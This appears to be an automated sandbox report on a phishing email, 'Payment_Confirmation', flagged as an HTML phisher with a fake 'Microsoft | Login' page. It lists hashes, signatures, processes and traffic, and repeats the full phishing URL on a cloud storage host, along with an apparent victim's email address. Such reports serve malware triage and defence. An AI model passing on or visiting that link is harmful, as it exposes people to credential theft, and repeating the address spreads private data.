Windows Analysis Report
Fwd_ Payment_Confirmation.msg

Overview

General Information

Sample Name: Fwd_ Payment_Confirmation.msg
Analysis ID: 756146
MD5: 4cfb650a9f6716e65b12578ad7357869
SHA1: 78b9efaf0c5436a04ab38b456ad935507359c7f8
SHA256: 25a3dbaae7f8949703add1c993037243f3b149c7a220eb4e5878e860976b87e0

Detection

HTMLPhisher
Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Misleading page title found
Yara detected HtmlPhish10
HTML body contains low number of good links
Invalid T&C link found
No HTML title found

Classification

Phishing

barindex
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it Page Title: Microsoft | Login
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it Page Title: Microsoft | Login
Source: Yara match File source: 92753.0.pages.csv, type: HTML
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: Number of links: 0
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: Number of links: 0
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: Invalid link: Privacy statement
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: Invalid link: Privacy statement
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: HTML title missing
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: HTML title missing
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: No <meta name="author".. found
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: No <meta name="author".. found
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: No <meta name="copyright".. found
Source: https://30-11-vjwerg9-80eu5rht-0ghjwr-0gfhwe-0r98gf.obs.ap-southeast-1.myhuaweicloud.com/hg084e5trh-ghewr8uinfv-we0r8hgb-0rhgf-rg.htm?AWSAccessKeyId=BRMRSNWPZ46HN5N4CQ0R&Expires=1669808553&Signature=BuuhlTMKcaFhD8DBKX3w/0IwY4s%3D#franco.bin@cuzziol.it HTTP Parser: No <meta name="copyright".. found
Source: chrome.exe Memory has grown: Private usage: 0MB later: 28MB
Source: unknown DNS traffic detected: queries for: clients2.google.com
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE File created: C:\Users\alfredo\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_13929_20386-20221129T1749280939-2572.etl
Source: classification engine Classification label: mal56.phis.winMSG@24/2@11/218
Source: unknown Process created: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\alfredo\Desktop\Fwd_ Payment_Confirmation.msg
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\alfredo\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\IRQ7T0GH\Payment_Confirmation.hTm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1792,i,11491005883064114037,15152354911059901904,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1792,i,11491005883064114037,15152354911059901904,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: unknown Process created: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -Embedding
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE Process information set: NOOPENFILEERRORBOX
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs